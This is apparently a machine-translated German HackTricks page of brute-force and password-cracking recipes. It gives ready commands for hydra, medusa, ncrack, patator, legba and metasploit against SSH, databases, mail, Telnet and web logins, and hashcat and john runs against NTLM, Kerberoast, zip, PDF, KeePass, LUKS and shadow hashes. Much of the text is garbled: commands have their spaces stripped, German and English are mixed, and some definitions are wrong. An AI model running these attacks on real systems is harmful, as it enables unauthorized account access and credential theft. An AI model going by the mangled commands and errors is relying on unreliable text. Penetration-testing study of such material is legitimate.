Verwenden Sie Trickest, um mühelos Workflows zu erstellen und zu automatisieren, die von den weltweit fortschrittlichsten Community-Tools unterstützt werden.
Heute Zugriff erhalten:
Sammeln Sie so viele Informationen über das Ziel wie möglich und erstellen Sie ein benutzerdefiniertes Wörterbuch. Tools, die dabei helfen können:
Crunch
crunch460123456789ABCDEF-ocrunch1.txt#From length 4 to 6 using that alphabetcrunch44-f/usr/share/crunch/charset.lstmixalpha# Only length 4 using charset mixalpha (inside file charset.lst)@Lowercasealphacharacters,Uppercasealphacharacters%Numericcharacters^Specialcharactersincludingspaccrunch68-t,@@^^%%
Ein Wortlisten-Generator-Tool, das es Ihnen ermöglicht, eine Reihe von Wörtern bereitzustellen, um Ihnen die Möglichkeit zu geben, mehrere Variationen der gegebenen Wörter zu erstellen, um eine einzigartige und ideale Wortliste für die Verwendung in Bezug auf ein spezifisches Ziel zu erstellen.
Verwenden Sie Trickest, um einfach Workflows zu erstellen und zu automatisieren, die von den fortschrittlichsten Community-Tools der Welt unterstützt werden.
Heute Zugriff erhalten:
AJP steht für Apache JServ Protocol und ist ein Binärprotokoll, das von Apache Tomcat verwendet wird. Es wird normalerweise auf Port 8009 ausgeführt und kann für Angriffe wie Brute-Force verwendet werden.
Brute-forcing CouchDB is a common technique used to gain unauthorized access to the database. Attackers use automated tools to try a large number of username and password combinations until the correct one is found. This is why it is important to use strong, unique passwords and implement other security measures to protect your CouchDB instance from brute-force attacks.
FTP (File Transfer Protocol) ist ein weit verbreitetes Netzwerkprotokoll, das für die Übertragung von Dateien zwischen einem Client und einem Server verwendet wird. Es ist anfällig für Brute-Force-Angriffe, bei denen ein Angreifer versucht, sich durch Ausprobieren verschiedener Benutzernamen und Passwörter Zugriff zu verschaffen.
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
# Use https-post-form mode for https
Für https müssen Sie von "http-post-form" auf "https-post-form" ändern
HTTP - CMS -- (W)ordpress, (J)oomla oder (D)rupal oder (M)oodle
cmsmap-fW/J/D/M-ua-pahttps://wordpress.com# Check also https://github.com/evilsocket/legba/wiki/HTTP
IMAP
IMAP (Internet Message Access Protocol) is a standard email protocol that stores email messages on a mail server. When a hacker is conducting a brute-force attack on an IMAP server, they are attempting to gain unauthorized access by systematically trying all possible combinations of usernames and passwords until the correct one is found. This is typically done using automated tools that can quickly try thousands or even millions of combinations in a short amount of time.
Internet Relay Chat (IRC) ist ein weit verbreitetes Protokoll zum Echtzeit-Austausch von Nachrichten in Form von Text. Es wird häufig von Hackern genutzt, um Informationen auszutauschen und in Echtzeit zu kommunizieren.
LDAP (Lightweight Directory Access Protocol) ist ein Protokoll, das häufig für die Authentifizierung und Autorisierung in Anwendungen verwendet wird. Es kann durch Brute-Force-Angriffe kompromittiert werden, bei denen Angreifer systematisch verschiedene Kombinationen von Benutzernamen und Passwörtern ausprobieren, um Zugriff zu erhalten. Es ist wichtig, starke Passwörter zu verwenden und Sicherheitsmaßnahmen zu implementieren, um Brute-Force-Angriffe zu verhindern.
MSSQL ist eine relationale Datenbankverwaltungssystemsoftware, die von Microsoft entwickelt wurde. Es wird häufig für Webanwendungen verwendet, die auf Windows-Plattformen laufen. Beim Brute-Forcing von MSSQL-Datenbanken können Tools wie Hydra, Ncrack und Metasploit eingesetzt werden.
Brute force attacks are commonly used to crack passwords by trying all possible combinations until the correct one is found. In the context of MySQL, tools like Hydra and Medusa can be used to perform brute force attacks against the MySQL server. These tools allow attackers to automate the process of trying different username and password combinations until they gain access to the MySQL database. It is important to use strong and complex passwords to mitigate the risk of a successful brute force attack.
# hydrahydra-Lusernames.txt-Ppass.txt<IP>mysql# msfconsolemsf>useauxiliary/scanner/mysql/mysql_login; setVERBOSEfalse# medusamedusa -h <IP/Host> -u <username> -P <password_list> <-f | to stop medusa on first success attempt> -t <threads> -M mysql
#Legbalegbamysql--usernameroot--passwordwordlists/passwords.txt--targetlocalhost:3306
OracleSQL
Brute-force attacks against OracleSQL databases are typically carried out using tools such as Hydra or Metasploit. These tools can automate the process of trying a large number of possible usernames and passwords until the correct combination is found. It is important to note that brute-force attacks can be time-consuming and resource-intensive, so they should be used as a last resort when other methods of gaining access to the database have been exhausted.
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
./odat.pypasswordguesser-s $SERVER -d $SID./odat.pypasswordguesser-s $MYSERVER -p $PORT --accounts-fileaccounts_multiple.txt#msf1msf>useadmin/oracle/oracle_loginmsf>setRHOSTS<IP>msf>setRPORT1521msf>setSID<SID>#msf2, this option uses nmap and it fails sometimes for some reasonmsf>usescanner/oracle/oracle_loginmsf>setRHOSTS<IP>msf>setRPORTS1521msf>setSID<SID>#for some reason nmap fails sometimes when executing this scriptnmap--scriptoracle-brute-p1521--script-argsoracle-brute.sid=<SID><IP>legbaoracle--targetlocalhost:1521--oracle-databaseSYSTEM--usernameadmin--passworddata/passwords.txt
Um oracle_login mit patator zu verwenden, müssen Sie installieren:
POP steht für "Passwort-Überprüfung". Es handelt sich um eine Methode, bei der ein Angreifer systematisch verschiedene Passwörter ausprobiert, um unbefugten Zugriff auf ein Konto oder ein System zu erlangen.
Brute-force attacks against PostgreSQL databases are typically carried out using tools such as Hydra or Metasploit. These tools allow attackers to systematically try different combinations of usernames and passwords until the correct one is found. To protect against brute-force attacks, it is important to use strong, complex passwords, implement account lockout policies, and monitor database logs for any suspicious activity.
Redis ist eine Open-Source-In-Memory-Datenbank, die häufig für Caching, Sitzungsspeicherung und als Message-Broker eingesetzt wird.
msf>useauxiliary/scanner/redis/redis_loginnmap--scriptredis-brute-p6379<IP>hydra–P/path/pass.txtredis://<IP>:<PORT># 6379 is the defaultlegbaredis--targetlocalhost:6379--usernameadmin--passworddata/passwords.txt [--redis-ssl]
Rexec
Rexec ist ein Dienst, der normalerweise auf Port 512 läuft und es einem Benutzer ermöglicht, Befehle auf einem Remote-System auszuführen. Es kann für Brute-Force-Angriffe genutzt werden, um Benutzernamen und Passwörter zu erraten.
Rlogin ist ein Remote-Login-Programm, das häufig von Hackern verwendet wird, um Benutzerkonten zu übernehmen. Es kann durch Brute-Force-Angriffe kompromittiert werden, bei denen systematisch Passwörter ausprobiert werden, bis das richtige gefunden wird. Es ist wichtig, starke Passwörter zu verwenden, um sich vor solchen Angriffen zu schützen.
Rsh (Remote Shell) is a simple remote shell client included with Unix operating systems. It can be used to execute commands on a remote system. Brute-forcing Rsh involves trying to guess usernames and passwords to gain unauthorized access to a remote system.
RTSP (Real Time Streaming Protocol) is a network control protocol designed for use in entertainment and communications systems to control streaming media servers. It is used to establish and control media sessions between end points.
hydra-lroot-Ppasswords.txt<IP>rtsp
SFTP
legbasftp--usernameadmin--passwordwordlists/passwords.txt--targetlocalhost:22# Try keys from a folderlegbasftp--usernameadmin--password'@/some/path/*'--ssh-auth-modekey--targetlocalhost:22
SNMP
SNMP (Simple Network Management Protocol) is a protocol used for network management and monitoring. It operates by sending messages called "protocol data units" (PDUs) to different parts of a network. SNMP is commonly targeted during brute-force attacks due to its default community strings, which are often left unchanged by system administrators.
SMB steht für Server Message Block und ist ein Protokoll, das für die Datei- und Druckerfreigabe in Netzwerken verwendet wird. Es kann für Brute-Force-Angriffe genutzt werden, um Passwörter zu erraten und auf freigegebene Ressourcen zuzugreifen.
hydra-l<username>-P/path/to/passwords.txt<IP>smtp-Vhydra-l<username>-P/path/to/passwords.txt-s587<IP>-S-v-V#Port 587 for SMTP with SSLlegba smtp --username admin@example.com --password wordlists/passwords.txt --target localhost:25 [--smtp-mechanism <mech>]
SOCKS
SOCKS steht für "Socket Secure" und ist ein Internet-Protokoll, das zur Umleitung von Netzwerkverkehr über einen Proxyserver dient. Es ermöglicht die Umgehung von Firewalls und kann für verschiedene Zwecke wie Anonymität oder das Umgehen geografischer Beschränkungen eingesetzt werden.
Brute-force-Angriffe auf SQL Server können durch Tools wie SQL Brute Force durchgeführt werden. Diese Tools versuchen, Benutzeranmeldeinformationen durch systematisches Ausprobieren verschiedener Kombinationen von Benutzernamen und Passwörtern zu erraten. Es ist wichtig, starke und komplexe Passwörter zu verwenden, um Brute-Force-Angriffe zu erschweren.
#Use the NetBIOS name of the machine as domaincrackmapexecmssql<IP>-d<DomainName>-uusernames.txt-ppasswords.txthydra-L/root/Desktop/user.txt–P/root/Desktop/pass.txt<IP>mssqlmedusa-h<IP>–U/root/Desktop/user.txt–P/root/Desktop/pass.txt–Mmssqlnmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed. Be careful with the number of passwords in the list, this could block accounts
msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT
SSH
SSH (Secure Shell) ist ein Protokoll, das verwendet wird, um eine sichere Verbindung zu einem entfernten System herzustellen. Es wird oft für die sichere Verwaltung von Systemen und den Dateitransfer verwendet. Ein häufiger Angriffsvektor ist das Brute-Forcing von SSH-Passwörtern, bei dem Angreifer automatisch verschiedene Passwörter ausprobieren, um Zugriff auf ein System zu erlangen. Es ist wichtig, starke Passwörter zu verwenden und Sicherheitsmaßnahmen wie das Sperren von Benutzerkonten nach einer bestimmten Anzahl von fehlgeschlagenen Anmeldeversuchen zu implementieren, um Brute-Force-Angriffe zu verhindern.
hydra-lroot-Ppasswords.txt [-t 32]<IP>sshncrack-p22--userroot-Ppasswords.txt<IP> [-T 5]medusa-uroot-P500-worst-passwords.txt-h<IP>-Msshpatator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
legbassh--usernameadmin--passwordwordlists/passwords.txt--targetlocalhost:22# Try keys from a folderlegbassh--usernameadmin--password'@/some/path/*'--ssh-auth-modekey--targetlocalhost:22
Schwache SSH-Schlüssel / Vorhersehbarer PRNG von Debian
Einige Systeme weisen bekannte Schwachstellen im Zufallsseed auf, der zur Generierung kryptografischer Materialien verwendet wird. Dies kann zu einem dramatisch reduzierten Schlüsselraum führen, der mit Tools wie snowdroppe/ssh-keybrute bruteforced werden kann. Vorgefertigte Sets schwacher Schlüssel sind ebenfalls verfügbar, wie z.B. g0tmi1k/debian-ssh.
STOMP (ActiveMQ, RabbitMQ, HornetQ und OpenMQ)
Das STOMP-Textprotokoll ist ein weit verbreitetes Messaging-Protokoll, das eine nahtlose Kommunikation und Interaktion mit beliebten Nachrichtenwarteschlangendiensten wie RabbitMQ, ActiveMQ, HornetQ und OpenMQ ermöglicht. Es bietet einen standardisierten und effizienten Ansatz zum Austausch von Nachrichten und zur Durchführung verschiedener Messaging-Operationen.
Telnet ist ein Netzwerkprotokoll, das zur Kommunikation mit entfernten Systemen oder Geräten über das Internet oder lokale Netzwerke verwendet wird. Es ermöglicht Benutzern, eine Verbindung zu einem entfernten Host herzustellen und Befehle auszuführen. Telnet kann für Brute-Force-Angriffe verwendet werden, bei denen versucht wird, sich durch Ausprobieren verschiedener Kombinationen von Benutzernamen und Passwörtern Zugriff zu einem System zu verschaffen. Es ist wichtig, starke Authentifizierungsmethoden zu implementieren, um solche Angriffe zu verhindern.
hydra-lroot-Ppasswords.txt [-t 32]<IP>telnetncrack-p23--userroot-Ppasswords.txt<IP> [-T 5]medusa-uroot-P500-worst-passwords.txt-h<IP>-Mtelnetlegbatelnet \--username admin \--password wordlists/passwords.txt \--target localhost:23 \--telnet-user-prompt "login: " \--telnet-pass-prompt "Password: " \--telnet-prompt ":~$ " \--single-match # this option will stop the program when the first valid pair of credentials will be found, can be used with any plugin
VNC
Virtual Network Computing (VNC) ist eine Technologie, die es ermöglicht, die grafische Benutzeroberfläche eines entfernten Computers über ein Netzwerk zu sehen und zu steuern.
Verwenden Sie Trickest, um einfach Workflows zu erstellen und zu automatisieren, die von den fortschrittlichsten Community-Tools der Welt unterstützt werden.
Heute Zugriff erhalten:
#$zip2$*0*3*0*a56cb83812be3981ce2a83c581e4bc4f*4d7b*24*9af41ff662c29dfff13229eefad9a9043df07f2550b9ad7dfc7601f1a9e789b5ca402468*694b6ebb6067308bedcd*$/zip2$
hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt
.\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attack
Bekannter Klartext-Zip-Angriff
Sie müssen den Klartext (oder einen Teil des Klartexts) einer Datei kennen, die sich im verschlüsselten Zip-Archiv befindet. Sie können die Dateinamen und die Größe der Dateien, die sich im verschlüsselten Zip-Archiv befinden, überprüfen, indem Sie 7z l verschlüsseltes.zip ausführen.
Laden Sie bkcrack von der Seite mit den Veröffentlichungen herunter.
# You need to create a zip file containing only the file that is inside the encrypted zip
zip plaintext.zip plaintext.file
./bkcrack -C <encrypted.zip> -c <plaintext.file> -P <plaintext.zip> -p <plaintext.file>
# Now wait, this should print a key such as 7b549874 ebc25ec5 7e465e18
# With that key you can create a new zip file with the content of encrypted.zip
# but with a different pass that you set (so you can decrypt it)
./bkcrack -C <encrypted.zip> -k 7b549874 ebc25ec5 7e465e18 -U unlocked.zip new_pwd
unzip unlocked.zip #User new_pwd as password
7z
cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z
#Download and install requirements for 7z2john
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl
apt-get install libcompress-raw-lzma-perl
./7z2john.pl file.7z > 7zhash.john
PDF
Brute-force attacks on PDF files are usually used to recover passwords protecting the file. Tools like pdfcrack and John the Ripper can be used to perform brute-force attacks on PDF files. These tools work by trying all possible passwords until the correct one is found. Brute-forcing a password can be time-consuming and resource-intensive, so it is important to use a good wordlist and have a powerful machine to perform the attack efficiently.
apt-get install pdfcrack
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
#pdf2john didn't work well, john didn't know which hash type was
# To permanently decrypt the pdf
sudo apt-get install qpdf
qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf
git clone https://github.com/Sjord/jwtcrack.git
cd jwtcrack
#Bruteforce using crackjwt.py
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
#Bruteforce using john
python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
john jwt.john #It does not work with Kali-John
NTLM knacken
Format:USUARIO:ID:HASH_LM:HASH_NT:::
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes
hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot
Keepass
sudo apt-get install -y kpcli #Install keepass tools like keepass2john
keepass2john file.kdbx > hash #The keepass is only using password
keepass2john -k <file-password> file.kdbx > hash # The keepass is also using a file as a needed credential
#The keepass can use a password and/or a file as credentials, if it is using both you need to provide them to keepass2john
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Keberoasting
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
bruteforce-luks -f ./list.txt ./backup.img
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt
Methode 2
cryptsetup luksDump backup.img #Check that the payload offset is set to 4096
dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1
hashcat -m 14600 -a 0 luckshash wordlists/rockyou.txt
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt
#John hash format
<USERNAME>:$mysqlna$<CHALLENGE>*<RESPONSE>
dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d
PGP/GPG Privater Schlüssel
gpg2john private_pgp.key #This will generate the hash and save it in a file
john --wordlist=/usr/share/wordlists/rockyou.txt ./hash
Wenn Sie eine xlsx-Datei mit einer Spalte haben, die durch ein Passwort geschützt ist, können Sie es entsperren:
Laden Sie es auf Google Drive hoch und das Passwort wird automatisch entfernt
Um es manuell zu entfernen:
unzip file.xlsx
grep -R "sheetProtection" ./*
# Find something like: <sheetProtection algorithmName="SHA-512"
hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg" saltValue="U9oZfaVCkz5jWdhs9AA8nA" spinCount="100000" sheet="1" objects="1" scenarios="1"/>
# Remove that line and rezip the file
zip -r file.xls .
PFX-Zertifikate
# From https://github.com/Ridter/p12tool
./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt
# From https://github.com/crackpkcs12/crackpkcs12
crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx
Verwenden Sie Trickest, um einfach Workflows zu erstellen und zu automatisieren, die von den weltweit fortschrittlichsten Community-Tools unterstützt werden.
Heute Zugriff erhalten:
hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.rule
Wortlisten-Kombinations-Angriff
Es ist möglich, 2 Wortlisten zu einer zusammenzuführen mit hashcat.
Wenn Liste 1 das Wort "hello" enthielt und die zweite 2 Zeilen mit den Wörtern "world" und "earth" enthielt. Werden die Wörter helloworld und helloearth generiert.
# This will combine 2 wordlists
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt
# Same attack as before but adding chars in the newly generated words
# In the previous example this will generate:
## hello-world!
## hello-earth!
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt -j $- -k $!
Maskenangriff (-a 3)
# Mask attack with simple mask
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt ?u?l?l?l?l?l?l?l?d
hashcat --help #will show the charsets and are as follows
? | Charset
===+=========
l | abcdefghijklmnopqrstuvwxyz
u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
d | 0123456789
h | 0123456789abcdef
H | 0123456789ABCDEF
s | !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
a | ?l?u?d?s
b | 0x00 - 0xff
# Mask attack declaring custom charset
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?l?1
## -1 ?d?s defines a custom charset (digits and specials).
## ?u?l?l?l?l?l?l?l?1 is the mask, where "?1" is the custom charset.
# Mask attack with variable password length
## Create a file called masks.hcmask with this content:
?d?s,?u?l?l?l?l?1
?d?s,?u?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?l?1
## Use it to crack the password
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt .\masks.hcmask
# Mask numbers will be appended to each word in the wordlist
hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d
# Mask numbers will be prepended to each word in the wordlist
hashcat.exe -a 7 -m 1000 C:\Temp\ntlm.txt ?d?d?d?d \wordlist.txt
Hashcat-Modi
hashcat --example-hashes | grep -B1 -A2 "NTLM"
Brute Forcing
Cracking Linux Hashes - /etc/shadow file
Brute-Force-Angriffe sind eine gängige Methode, um Passwörter zu knacken. Sie beinhalten das systematische Ausprobieren aller möglichen Kombinationen von Passwörtern, bis das richtige gefunden wird. Beim Knacken von Linux-Hashes, die in der Datei /etc/shadow gespeichert sind, kann ein Brute-Force-Angriff verwendet werden, um schwache Passwörter zu identifizieren.
Brute force attacks are a common way to crack passwords. They consist of systematically checking all possible passwords until the correct one is found. This method is time-consuming but effective, especially for weak passwords. There are tools like John the Ripper and Hashcat that can automate the brute force process.
Windows Hashes
When it comes to cracking Windows hashes, tools like Ophcrack and L0phtCrack are commonly used. These tools can help in recovering Windows passwords by brute-forcing the hashed passwords. It is important to note that strong and complex passwords are harder to crack using brute force methods.
Brute-Force-Angriffe sind eine der ältesten und effektivsten Methoden zum Knacken von Passwörtern. Sie beinhalten das systematische Ausprobieren aller möglichen Kombinationen, bis das richtige Passwort gefunden wird. Diese Methode kann auch verwendet werden, um häufig verwendete Anwendungshashes zu knacken. Einige Tools, die für Brute-Force-Angriffe verwendet werden können, sind Hashcat, John the Ripper und Hydra.
900 | MD4 | Raw Hash
0 | MD5 | Raw Hash
5100 | Half MD5 | Raw Hash
100 | SHA1 | Raw Hash
10800 | SHA-384 | Raw Hash
1400 | SHA-256 | Raw Hash
1700 | SHA-512 | Raw Hash
Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an dieHackTricks und HackTricks Cloud GitHub-Repositories einreichen.
Verwenden Sie Trickest, um mühelos Workflows zu erstellen und zu automatisieren, die von den weltweit fortschrittlichsten Community-Tools unterstützt werden.
Heute Zugriff erhalten: